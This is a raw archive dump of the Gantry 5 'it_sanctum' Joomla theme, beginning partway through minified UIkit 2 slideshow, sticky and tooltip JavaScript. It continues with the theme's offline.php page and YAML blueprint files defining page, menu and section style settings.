load",i.Utils.debounce(function(){t.resize(),t.fixFullscreen&&(t.container.css("height",window.innerHeight),t.slides.css("height",window.innerHeight))},100)),setTimeout(function(){t.resize()},80),this.options.autoplay&&this.start(),this.options.videoautoplay&&this.slides.eq(this.current).data("media")&&this.playmedia(this.slides.eq(this.current).data("media")),this.options.kenburns&&this.applyKenBurns(this.slides.eq(this.current)),this.container.on({mouseenter:function(){t.options.pauseOnHover&&(t.hovering=!0)},mouseleave:function(){t.hovering=!1}}),this.on("swipeRight swipeLeft",function(i){t["swipeLeft"==i.type?"next":"previous"]()}),this.on("display.uk.check",function(){t.element.is(":visible")&&(t.resize(),t.fixFullscreen&&(t.container.css("height",window.innerHeight),t.slides.css("height",window.innerHeight)))}),i.domObserve(this.element,function(){t.container.children(":not([data-slideshow-slide])").not(".uk-slideshow-ghost").length&&t.update(!0)})},update:function(t){var e,a=this,n=0;this.slides=this.container.children(),this.slidesCount=this.slides.length,this.slides.eq(this.current).length||(this.current=0),this.slides.each(function(t){var o=i.$(this);if(!o.data("processed")){var r=o.children("img,video,iframe").eq(0),d="html";if(o.data("media",r),o.data("sizer",r),r.length){var u;switch(d=r[0].nodeName.toLowerCase(),r[0].nodeName){case"IMG":var h=i.$('<div class="uk-cover-background uk-position-cover"></div>').css({"background-image":"url("+r.attr("src")+")"});r.attr("width")&&r.attr("height")&&(u=i.$("<canvas></canvas>").attr({width:r.attr("width"),height:r.attr("height")}),r.replaceWith(u),r=u,u=void 0),r.css({width:"100%",height:"auto",opacity:0}),o.prepend(h).data("cover",h);break;case"IFRAME":var c=r[0].src,l="sw-"+ ++s;r.attr("src","").on("load",function(){if((t!==a.current||t==a.current&&!a.options.videoautoplay)&&a.pausemedia(r),a.options.videomute){a.mutemedia(r);var i=setInterval(function(t){return function(){a.mutemedia(r),++t>=4&&clearInterval(i)}}(0),250)}}).data("slideshow",a).attr("data-player-id",l).attr("src",[c,c.indexOf("?")>-1?"&":"?","enablejsapi=1&api=1&player_id="+l].join("")).addClass("uk-position-absolute"),i.support.touch||r.css("pointer-events","none"),u=!0,i.cover&&(i.cover(r),r.attr("data-uk-cover","{}"));break;case"VIDEO":r.addClass("uk-cover-object uk-position-absolute"),u=!0,a.options.videomute&&a.mutemedia(r)}if(u){e=i.$("<canvas></canvas>").attr({width:r[0].width,height:r[0].height});var p=i.$('<img style="width:100%;height:auto;">').attr("src",e[0].toDataURL());o.prepend(p),o.data("sizer",p)}}else o.data("sizer",o);a.hasKenBurns(o)&&o.data("cover").css({"-webkit-animation-duration":a.kbanimduration,"animation-duration":a.kbanimduration}),o.data("processed",++n),o.attr("data-slideshow-slide",d)}}),n&&(this.triggers=this.find("[data-uk-slideshow-item]"),this.slides.attr("aria-hidden","true").removeClass("uk-active").eq(this.current).addClass("uk-active").attr("aria-hidden","false"),this.triggers.filter('[data-uk-slideshow-item="'+this.current+'"]').addClass("uk-active")),t&&n&&this.resize()},resize:function(){if(!this.container.hasClass("uk-slideshow-fullscreen")){var t=this.options.height;"auto"===this.options.height&&(t=0,this.slides.css("height","").each(function(){t=Math.max(t,i.$(this).height())})),this.container.css("height",t),this.slides.css("height",t)}},show:function(s,e){if(!this.animating&&this.current!=s){this.animating=!0;var a=this,n=this.slides.eq(this.current),o=this.slides.eq(s),r=e?e:this.current<s?1:-1,d=n.data("media"),u=t[this.options.animation]?this.options.animation:"fade",h=o.data("media"),c=function(){a.animating&&(d&&d.is("video,iframe")&&a.pausemedia(d),h&&h.is("video,iframe")&&a.playmedia(h),o.addClass("uk-active").attr("aria-hidden","false"),n.removeClass("uk-active").attr("aria-hidden","true"),a.animating=!1,a.current=s,i.Utils.checkDisplay(o,'[class*="uk-animation-"]:not(.uk-cover-background.uk-position-cover)'),a.trigger("show.uk.slideshow",[o,n,a]))};a.applyKenBurns(o),i.support.animation||(u="none"),n=i.$(n),o=i.$(o),a.trigger("beforeshow.uk.slideshow",[o,n,a]),t[u].apply(this,[n,o,r]).then(c),a.triggers.removeClass("uk-active"),a.triggers.filter('[data-uk-slideshow-item="'+s+'"]').addClass("uk-active")}},applyKenBurns:function(i){if(this.hasKenBurns(i)){var t=this.options.kenburnsanimations,s=this.kbindex||0;i.data("cover").attr("class","uk-cover-background uk-position-cover").width(),i.data("cover").addClass(["uk-animation-scale","uk-animation-reverse",t[s].trim()].join(" ")),this.kbindex=t[s+1]?s+1:0}},hasKenBurns:function(i){return this.options.kenburns&&i.data("cover")},next:function(){this.show(this.slides[this.current+1]?this.current+1:0,1)},previous:function(){this.show(this.slides[this.current-1]?this.current-1:this.slides.length-1,-1)},start:function(){this.stop();var i=this;this.interval=setInterval(function(){i.hovering||i.next()},this.options.autoplayInterval)},stop:function(){this.interval&&clearInterval(this.interval)},playmedia:function(i){if(i&&i[0])switch(i[0].nodeName){case"VIDEO":this.options.videomute||(i[0].muted=!1),i[0].play();break;case"IFRAME":this.options.videomute||i[0].contentWindow.postMessage('{ "event": "command", "func": "unmute", "method":"setVolume", "value":1}',"*"),i[0].contentWindow.postMessage('{ "event": "command", "func": "playVideo", "method":"play"}',"*")}},pausemedia:function(i){switch(i[0].nodeName){case"VIDEO":i[0].pause();break;case"IFRAME":i[0].contentWindow.postMessage('{ "event": "command", "func": "pauseVideo", "method":"pause"}',"*")}},mutemedia:function(i){switch(i[0].nodeName){case"VIDEO":i[0].muted=!0;break;case"IFRAME":i[0].contentWindow.postMessage('{ "event": "command", "func": "mute", "method":"setVolume", "value":0}',"*")}}}),t={none:function(){var t=i.$.Deferred();return t.resolve(),t.promise()},scroll:function(t,s,e){var a=i.$.Deferred();return t.css("animation-duration",this.options.duration+"ms"),s.css("animation-duration",this.options.duration+"ms"),s.css("opacity",1).one(i.support.animation.end,function(){t.css("opacity",0).removeClass(-1==e?"uk-slideshow-scroll-backward-out":"uk-slideshow-scroll-forward-out"),s.removeClass(-1==e?"uk-slideshow-scroll-backward-in":"uk-slideshow-scroll-forward-in"),a.resolve()}.bind(this)),t.addClass(-1==e?"uk-slideshow-scroll-backward-out":"uk-slideshow-scroll-forward-out"),s.addClass(-1==e?"uk-slideshow-scroll-backward-in":"uk-slideshow-scroll-forward-in"),s.width(),a.promise()},swipe:function(t,s,e){var a=i.$.Deferred();return t.css("animation-duration",this.options.duration+"ms"),s.css("animation-duration",this.options.duration+"ms"),s.css("opacity",1).one(i.support.animation.end,function(){t.css("opacity",0).removeClass(-1===e?"uk-slideshow-swipe-backward-out":"uk-slideshow-swipe-forward-out"),s.removeClass(-1===e?"uk-slideshow-swipe-backward-in":"uk-slideshow-swipe-forward-in"),a.resolve()}.bind(this)),t.addClass(-1==e?"uk-slideshow-swipe-backward-out":"uk-slideshow-swipe-forward-out"),s.addClass(-1==e?"uk-slideshow-swipe-backward-in":"uk-slideshow-swipe-forward-in"),s.width(),a.promise()},scale:function(t,s){var e=i.$.Deferred();return t.css("animation-duration",this.options.duration+"ms"),s.css("animation-duration",this.options.duration+"ms"),s.css("opacity",1),t.one(i.support.animation.end,function(){t.css("opacity",0).removeClass("uk-slideshow-scale-out"),e.resolve()}.bind(this)),t.addClass("uk-slideshow-scale-out"),t.width(),e.promise()},fade:function(t,s){var e=i.$.Deferred();return t.css("animation-duration",this.options.duration+"ms"),s.css("animation-duration",this.options.duration+"ms"),s.css("opacity",1),s.data("cover")||s.data("placeholder")||s.css("opacity",1).one(i.support.animation.end,function(){s.removeClass("uk-slideshow-fade-in")}).addClass("uk-slideshow-fade-in"),t.one(i.support.animation.end,function(){t.css("opacity",0).removeClass("uk-slideshow-fade-out"),e.resolve()}.bind(this)),t.addClass("uk-slideshow-fade-out"),t.width(),e.promise()}},i.slideshow.animations=t,window.addEventListener("message",function(t){var s,e=t.data;if("string"==typeof e)try{e=JSON.parse(e)}catch(a){e={}}t.origin&&t.origin.indexOf("vimeo")>-1&&"ready"==e.event&&e.player_id&&(s=i.$('[data-player-id="'+e.player_id+'"]'),s.length&&s.data("slideshow").mutemedia(s))},!1)});

/*! Slideshow-fx */
!function(i){var t;window.UIkit2&&(t=i(UIkit2)),"function"==typeof define&&define.amd&&define("uikit-slideshow-fx",["uikit"],function(){return t||i(UIkit2)})}(function(i){"use strict";var t=i.slideshow.animations;i.$.extend(i.slideshow.animations,{slice:function(e,s,n,o){if(!e.data("cover"))return t.fade.apply(this,arguments);for(var r,a=i.$.Deferred(),c=Math.ceil(this.element.width()/this.options.slices),h=s.data("cover").css("background-image"),d=i.$('<li class="uk-slideshow-ghost"></li>').css({top:0,left:0,width:this.container.width(),height:this.container.height(),opacity:1,zIndex:15}),p=d.width(),l=d.height(),u="slice-up"==o?l:"0",f=0;f<this.options.slices;f++){"slice-up-down"==o&&(u=(f%2+2)%2==0?"0":l);var m,g=f==this.options.slices-1?c:c,x="rect(0px, "+g*(f+1)+"px, "+l+"px, "+c*f+"px)";m="rect(0px, "+g*(f+1)+"px, 0px, "+c*f+"px)",("slice-up"==o||"slice-up-down"==o&&(f%2+2)%2==0)&&(m="rect("+l+"px, "+g*(f+1)+"px, "+l+"px, "+c*f+"px)"),r=i.$('<div class="uk-cover-background"></div>').css({position:"absolute",top:0,left:0,width:p,height:l,"background-image":h,clip:m,opacity:0,transition:"all "+this.options.duration+"ms ease-in-out "+60*f+"ms","-webkit-transition":"all "+this.options.duration+"ms ease-in-out "+60*f+"ms"}).data("clip",x),d.append(r)}return this.container.append(d),d.children().last().on(i.support.transition.end,function(){setTimeout(function(){d.remove(),a.resolve()},0)}),d.width(),d.children().each(function(){r=i.$(this),r.css({clip:r.data("clip"),opacity:1})}),a.promise()},"slice-up":function(i,e,s){return t.slice.apply(this,[i,e,s,"slice-up"])},"slice-down":function(i,e,s){return t.slice.apply(this,[i,e,s,"slice-down"])},"slice-up-down":function(i,e,s){return t.slice.apply(this,[i,e,s,"slice-up-down"])},fold:function(e,s){if(!s.data("cover"))return t.fade.apply(this,arguments);for(var n,o=i.$.Deferred(),r=Math.ceil(this.element.width()/this.options.slices),a=s.data("cover").css("background-image"),c=i.$('<li class="uk-slideshow-ghost"></li>').css({width:s.width(),height:s.height(),opacity:1,zIndex:15}),h=s.width(),d=s.height(),p=0;p<this.options.slices;p++)n=i.$('<div class="uk-cover-background"></div>').css({position:"absolute",top:0,left:0,width:h,height:d,"background-image":a,"transform-origin":r*p+"px 0 0",clip:"rect(0px, "+r*(p+1)+"px, "+d+"px, "+r*p+"px)",opacity:0,transform:"scaleX(0.000001)",transition:"all "+this.options.duration+"ms ease-in-out "+(100+60*p)+"ms","-webkit-transition":"all "+this.options.duration+"ms ease-in-out "+(100+60*p)+"ms"}),c.prepend(n);return this.container.append(c),c.width(),c.children().first().on(i.support.transition.end,function(){setTimeout(function(){c.remove(),o.resolve()},0)}).end().css({transform:"scaleX(1)",opacity:1}),o.promise()},puzzle:function(s,n){if(!n.data("cover"))return t.fade.apply(this,arguments);for(var o,r,a,c=i.$.Deferred(),h=this,d=Math.round(this.options.slices/2),p=Math.round(n.width()/d),l=Math.round(n.height()/p),u=Math.round(n.height()/l)+1,f=n.data("cover").css("background-image"),m=i.$('<li class="uk-slideshow-ghost"></li>').css({width:this.container.width(),height:this.container.height(),opacity:1,zIndex:15}),g=this.container.width(),x=this.container.height(),w=0;l>w;w++)for(var v=0;d>v;v++)a=v==d-1?p+2:p,r=[u*w+"px",a*(v+1)+"px",u*(w+1)+"px",p*v+"px"],o=i.$('<div class="uk-cover-background"></div>').css({position:"absolute",top:0,left:0,opacity:0,width:g,height:x,"background-image":f,clip:"rect("+r.join(",")+")","-webkit-transform":"translateZ(0)",transform:"translateZ(0)"}),m.append(o);this.container.append(m);var k=e(m.children());return k.each(function(t){i.$(this).css({transition:"all "+h.options.duration+"ms ease-in-out "+(50+25*t)+"ms","-webkit-transition":"all "+h.options.duration+"ms ease-in-out "+(50+25*t)+"ms"})}).last().on(i.support.transition.end,function(){setTimeout(function(){m.remove(),c.resolve()},0)}),m.width(),k.css({opacity:1}),c.promise()},boxes:function(e,s,n,o){if(!s.data("cover"))return t.fade.apply(this,arguments);for(var r,a,c,h,d=i.$.Deferred(),p=Math.round(this.options.slices/2),l=Math.round(s.width()/p),u=Math.round(s.height()/l),f=Math.round(s.height()/u)+1,m=s.data("cover").css("background-image"),g=i.$('<li class="uk-slideshow-ghost"></li>').css({width:s.width(),height:s.height(),opacity:1,zIndex:15}),x=s.width(),w=s.height(),v=0;u>v;v++)for(h=0;p>h;h++)c=h==p-1?l+2:l,a=[f*v+"px",c*(h+1)+"px",f*(v+1)+"px",l*h+"px"],r=i.$('<div class="uk-cover-background"></div>').css({position:"absolute",top:0,left:0,opacity:1,width:x,height:w,"background-image":m,"transform-origin":a[3]+" "+a[0]+" 0",clip:"rect("+a.join(",")+")","-webkit-transform":"scale(0.0000000000000001)",transform:"scale(0.0000000000000001)"}),g.append(r);this.container.append(g);var k,b=0,y=0,$=0,I=[[]],M=g.children();for("boxes-reverse"==o&&(M=[].reverse.apply(M)),M.each(function(){I[b][y]=i.$(this),y++,y==p&&(b++,y=0,I[b]=[])}),h=0,k=0;p*u>h;h++){k=h;for(var z=0;u>z;z++)k>=0&&p>k&&I[z][k].css({transition:"all "+this.options.duration+"ms linear "+(50+$)+"ms","-webkit-transition":"all "+this.options.duration+"ms linear "+(50+$)+"ms"}),k--;$+=100}return M.last().on(i.support.transition.end,function(){setTimeout(function(){g.remove(),d.resolve()},0)}),g.width(),M.css({"-webkit-transform":"scale(1)",transform:"scale(1)"}),d.promise()},"boxes-reverse":function(i,e,s){return t.boxes.apply(this,[i,e,s,"boxes-reverse"])},"random-fx":function(){var i=["slice-up","fold","puzzle","slice-down","boxes","slice-up-down","boxes-reverse"];return this.fxIndex=(void 0===this.fxIndex?-1:this.fxIndex)+1,i[this.fxIndex]||(this.fxIndex=0),t[i[this.fxIndex]].apply(this,arguments)}});var e=function(i){for(var t,e,s=i.length;s;t=parseInt(Math.random()*s),e=i[--s],i[s]=i[t],i[t]=e);return i};return i.slideshow.animations});

/*! Sticky */
!function(t){var i;window.UIkit2&&(i=t(UIkit2)),"function"==typeof define&&define.amd&&define("uikit-sticky",["uikit"],function(){return i||t(UIkit2)})}(function(t){"use strict";function i(){var i=arguments.length?arguments:n;if(i.length&&!(e.scrollTop()<0))for(var o,a,r,h,p=e.scrollTop(),c=s.height(),l=e.height(),m=c-l,d=p>m?m-p:0,u=0;u<i.length;u++)if(h=i[u],h.element.is(":visible")&&!h.animate){if(h.check()){if(h.top<0?o=0:(r=h.element.outerHeight(),o=c-r-h.top-h.options.bottom-p-d,o=0>o?o+h.top:h.top),h.boundary&&h.boundary.length){var f=h.boundary.offset().top;a=h.boundtoparent?c-(f+h.boundary.outerHeight())+parseInt(h.boundary.css("padding-bottom")):c-f,o=p+r>c-a-(h.top<0?0:h.top)?c-a-(p+r):o}if(h.currentTop!=o){if(h.element.css({position:"fixed",top:o,width:h.getWidthFrom.length?h.getWidthFrom.width():h.element.width()}),!h.init&&(h.element.addClass(h.options.clsinit),location.hash&&p>0&&h.options.target)){var g=t.$(location.hash);g.length&&setTimeout(function(t,i){return function(){i.element.width();var e=t.offset(),s=e.top+t.outerHeight(),n=i.element.offset(),o=i.element.outerHeight(),a=n.top+o;n.top<s&&e.top<a&&(p=e.top-o-i.options.target,window.scrollTo(0,p))}}(g,h),0)}h.element.addClass(h.options.clsactive).removeClass(h.options.clsinactive),h.element.trigger("active.uk.sticky"),h.element.css("margin",""),h.options.animation&&h.init&&!t.Utils.isInView(h.wrapper)&&h.element.addClass(h.options.animation),h.currentTop=o}}else null!==h.currentTop&&h.reset();h.init=!0}}var e=t.$win,s=t.$doc,n=[],o=1;return t.component("sticky",{defaults:{top:0,bottom:0,animation:"",clsinit:"uk-sticky-init",clsactive:"uk-active",clsinactive:"",getWidthFrom:"",showup:!1,boundary:!1,media:!1,target:!1,disabled:!1},boot:function(){t.$doc.on("scrolling.uk.document",function(t,e){e&&e.dir&&(o=e.dir.y,i())}),t.$win.on("resize orientationchange",t.Utils.debounce(function(){if(n.length){for(var t=0;t<n.length;t++)n[t].reset(!0),n[t].self.computeWrapper();i()}},100)),t.ready(function(e){setTimeout(function(){t.$("[data-uk-sticky]",e).each(function(){var i=t.$(this);i.data("sticky")||t.sticky(i,t.Utils.options(i.attr("data-uk-sticky")))}),i()},0)})},init:function(){var i,a=this.options.boundary;this.wrapper=this.element.wrap('<div class="uk-sticky-placeholder"></div>').parent(),this.computeWrapper(),this.wrapper.css({"margin-top":this.element.css("margin-top"),"margin-bottom":this.element.css("margin-bottom"),"margin-left":this.element.css("margin-left"),"margin-right":this.element.css("margin-right")}),this.element.css("margin",0),a&&(a===!0||"!"===a[0]?(a=a===!0?this.wrapper.parent():this.wrapper.closest(a.substr(1)),i=!0):"string"==typeof a&&(a=t.$(a))),this.sticky={self:this,options:this.options,element:this.element,currentTop:null,wrapper:this.wrapper,init:!1,getWidthFrom:t.$(this.options.getWidthFrom||this.wrapper),boundary:a,boundtoparent:i,top:0,calcTop:function(){var i=this.options.top;if(this.options.top&&"string"==typeof this.options.top)if(this.options.top.match(/^(-|)(\d+)vh$/))i=window.innerHeight*parseInt(this.options.top,10)/100;else{var e=t.$(this.options.top).first();e.length&&e.is(":visible")&&(i=-1*(e.offset().top+e.outerHeight()-this.wrapper.offset().top))}this.top=i},reset:function(i){this.calcTop();var e=function(){this.element.css({position:"",top:"",width:"",left:"",margin:"0"}),this.element.removeClass([this.options.animation,"uk-animation-reverse",this.options.clsactive].join(" ")),this.element.addClass(this.options.clsinactive),this.element.trigger("inactive.uk.sticky"),this.currentTop=null,this.animate=!1}.bind(this);!i&&this.options.animation&&t.support.animation&&!t.Utils.isInView(this.wrapper)?(this.animate=!0,this.element.removeClass(this.options.animation).one(t.support.animation.end,function(){e()}).width(),this.element.addClass(this.options.animation+" uk-animation-reverse")):e()},check:function(){if(this.options.disabled)return!1;if(this.options.media)switch(typeof this.options.media){case"number":if(window.innerWidth<this.options.media)return!1;break;case"string":if(window.matchMedia&&!window.matchMedia(this.options.media).matches)return!1}var i=e.scrollTop(),n=s.height(),a=n-window.innerHeight,r=i>a?a-i:0,h=this.wrapper.offset().top,p=h-this.top-r,c=i>=p;return c&&this.options.showup&&(1==o&&(c=!1),-1==o&&!this.element.hasClass(this.options.clsactive)&&t.Utils.isInView(this.wrapper)&&(c=!1)),c}},this.sticky.calcTop(),n.push(this.sticky)},update:function(){i(this.sticky)},enable:function(){this.options.disabled=!1,this.update()},disable:function(t){this.options.disabled=!0,this.sticky.reset(t)},computeWrapper:function(){this.wrapper.css({height:-1==["absolute","fixed"].indexOf(this.element.css("position"))?this.element.outerHeight():"","float":"none"!=this.element.css("float")?this.element.css("float"):""}),"fixed"==this.element.css("position")&&this.element.css({width:this.sticky.getWidthFrom.length?this.sticky.getWidthFrom.width():this.element.width()})}}),t.sticky});

/*! Tooltip */
!function(t){var i;window.UIkit2&&(i=t(UIkit2)),"function"==typeof define&&define.amd&&define("uikit-tooltip",["uikit"],function(){return i||t(UIkit2)})}(function(t){"use strict";var i,o,e;return t.component("tooltip",{defaults:{offset:5,pos:"top",animation:"true",delay:0,cls:"",activeClass:"uk-active",src:function(t){var i=t.attr("title");return void 0!==i&&t.data("cached-title",i).removeAttr("title"),t.data("cached-title")}},tip:"",boot:function(){t.$html.on("mouseenter.tooltip.uikit focus.tooltip.uikit","[data-uk-tooltip]",function(){var i=t.$(this);i.data("tooltip")||(t.tooltip(i,t.Utils.options(i.attr("data-uk-tooltip"))),i.trigger("mouseenter"))})},init:function(){var o=this;i||(i=t.$('<div class="uk-tooltip"></div>').appendTo("body")),this.on({focus:function(){o.show()},blur:function(){o.hide()},mouseenter:function(){o.show()},mouseleave:function(){o.hide()}})},show:function(){if(this.tip="function"==typeof this.options.src?this.options.src(this.element):this.options.src,o&&clearTimeout(o),e&&clearInterval(e),"string"==typeof this.tip?this.tip.length:0){i.stop().css({top:-2e3,visibility:"hidden"}).removeClass(this.options.activeClass).show(),i.html('<div class="uk-tooltip-inner">'+this.tip+"</div>");var s=this,n=t.$.extend({},this.element.offset(),{width:this.element[0].offsetWidth,height:this.element[0].offsetHeight}),l=i[0].offsetWidth,f=i[0].offsetHeight,a="function"==typeof this.options.offset?this.options.offset.call(this.element):this.options.offset,p="function"==typeof this.options.pos?this.options.pos.call(this.element):this.options.pos,h=p.split("-"),c={display:"none",visibility:"visible",top:n.top+n.height+f,left:n.left};if("fixed"==t.$html.css("position")||"fixed"==t.$body.css("position")){var r=t.$("body").offset(),d=t.$("html").offset(),u={top:d.top+r.top,left:d.left+r.left};n.left-=u.left,n.top-=u.top}"left"!=h[0]&&"right"!=h[0]||"right"!=t.langdirection||(h[0]="left"==h[0]?"right":"left");var m={bottom:{top:n.top+n.height+a,left:n.left+n.width/2-l/2},top:{top:n.top-f-a,left:n.left+n.width/2-l/2},left:{top:n.top+n.height/2-f/2,left:n.left-l-a},right:{top:n.top+n.height/2-f/2,left:n.left+n.width+a}};t.$.extend(c,m[h[0]]),2==h.length&&(c.left="left"==h[1]?n.left:n.left+n.width-l);var v=this.checkBoundary(c.left,c.top,l,f);if(v){switch(v){case"x":p=2==h.length?h[0]+"-"+(c.left<0?"left":"right"):c.left<0?"right":"left";break;case"y":p=2==h.length?(c.top<0?"bottom":"top")+"-"+h[1]:c.top<0?"bottom":"top";break;case"xy":p=2==h.length?(c.top<0?"bottom":"top")+"-"+(c.left<0?"left":"right"):c.left<0?"right":"left"}h=p.split("-"),t.$.extend(c,m[h[0]]),2==h.length&&(c.left="left"==h[1]?n.left:n.left+n.width-l)}c.left-=t.$body.position().left,o=setTimeout(function(){i.css(c).attr("class",["uk-tooltip","uk-tooltip-"+p,s.options.cls].join(" ")),s.options.animation?i.css({opacity:0,display:"block"}).addClass(s.options.activeClass).animate({opacity:1},parseInt(s.options.animation,10)||200):i.show().addClass(s.options.activeClass),o=!1,e=setInterval(function(){s.element.is(":visible")||s.hide()},150)},parseInt(this.options.delay,10)||0)}},hide:function(){if(!this.element.is("input")||this.element[0]!==document.activeElement)if(o&&clearTimeout(o),e&&clearInterval(e),i.stop(),this.options.animation){var t=this;i.fadeOut(parseInt(this.options.animation,10)||200,function(){i.removeClass(t.options.activeClass)})}else i.hide().removeClass(this.options.activeClass)},content:function(){return this.tip},checkBoundary:function(i,o,e,s){var n="";return(0>i||i-t.$win.scrollLeft()+e>window.innerWidth)&&(n+="x"),(0>o||o-t.$win.scrollTop()+s>window.innerHeight)&&(n+="y"),n}}),t.tooltip});
PK!��z�iiit_sanctum/offline.phpnu&1i�<?php
/**
 * @package   Gantry 5 Theme
 * @author    RocketTheme http://www.rockettheme.com
 * @copyright Copyright (C) 2007 - 2015 RocketTheme, LLC
 * @license   GNU/GPLv2 and later
 *
 * http://www.gnu.org/licenses/gpl-2.0.html
 */

defined('_JEXEC') or die;

// Bootstrap Gantry framework or fail gracefully (inside included file).
$gantry = include __DIR__ . '/includes/gantry.php';

/** @var \Gantry\Framework\Theme $theme */
$theme = $gantry['theme'];

ob_start();
include JPATH_THEMES . '/system/offline.php';
$html = ob_get_clean();
$start = strpos($html, '<body>') + 6;
$end = strpos($html, '</body>', $start);

$context = array(
    'message' => substr($html, $start, $end - $start)
);

// Reset used outline configuration.
unset($gantry['configuration']);

// Render the page.
echo $theme
    ->setLayout('_offline')
    ->render('offline.html.twig', $context);
PK!�3C$it_sanctum/blueprints/page.yamlnu&1i�name: Page settings
description: Settings that can be applied to the page.

form:
  fields:

    doctype:
      type: input.text
      label: Doctype
      default: html

    body.class:
      type: input.text
      label: Body Class
      default: gantry
PK!ȶa�++)it_sanctum/blueprints/styles/feature.yamlnu&1i�name: Feature Styles
description: Feature styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!V���&it_sanctum/blueprints/styles/menu.yamlnu&1i�name: Menu
description: Set menu style configuration options.
type: configuration

form:
  fields:

    col-width:
      type: input.text
      label: Simple Dropdown Width
      description: Specify the default width of menu dropdowns for simple mode in rem, em or px units. This width can be overridden on each individual menu item from the menu editor.
      default: "180px"
      pattern: '\d+(\.\d+){0,1}(rem|em|px)'
    animation:
      type: select.select
      label: Dropdown Animation
      description: Select the dropdown animation.
      default: g-fade
      options:
        g-no-animation: No Animation
        g-fade: Fade
        g-zoom: Zoom
        g-fade-in-up: Fade In Up
PK!p�9��&it_sanctum/blueprints/styles/base.yamlnu&1i�name: Base Styles
description: Base styles for the Sanctum theme
type: core

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      description: Background color of the <body>. It will be overridden by the Section Styles below.
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      description: Background image of the <body>. It will be overridden by the Section Styles below.
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      description: Text color of the <body>. It will be overridden by the Section Styles below.
      default: "#959595"
PK!�#�A++)it_sanctum/blueprints/styles/sidebar.yamlnu&1i�name: Sidebar Styles
description: Sidebar styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!G']6II,it_sanctum/blueprints/styles/breadcrumb.yamlnu&1i�name: Breadcrumb Styles
description: Breadcrumb styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: "gantry-media://bread.png"
    background-repeat:
      type: select.select
      label: Background Repeat
      default: No repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!�,�5++)it_sanctum/blueprints/styles/utility.yamlnu&1i�name: Utility Styles
description: Utility styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!�]C�//+it_sanctum/blueprints/styles/extension.yamlnu&1i�name: Extension Styles
description: Extension styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!�+��))(it_sanctum/blueprints/styles/bottom.yamlnu&1i�name: Bottom Styles
description: Bottom styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#f7f7f7"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
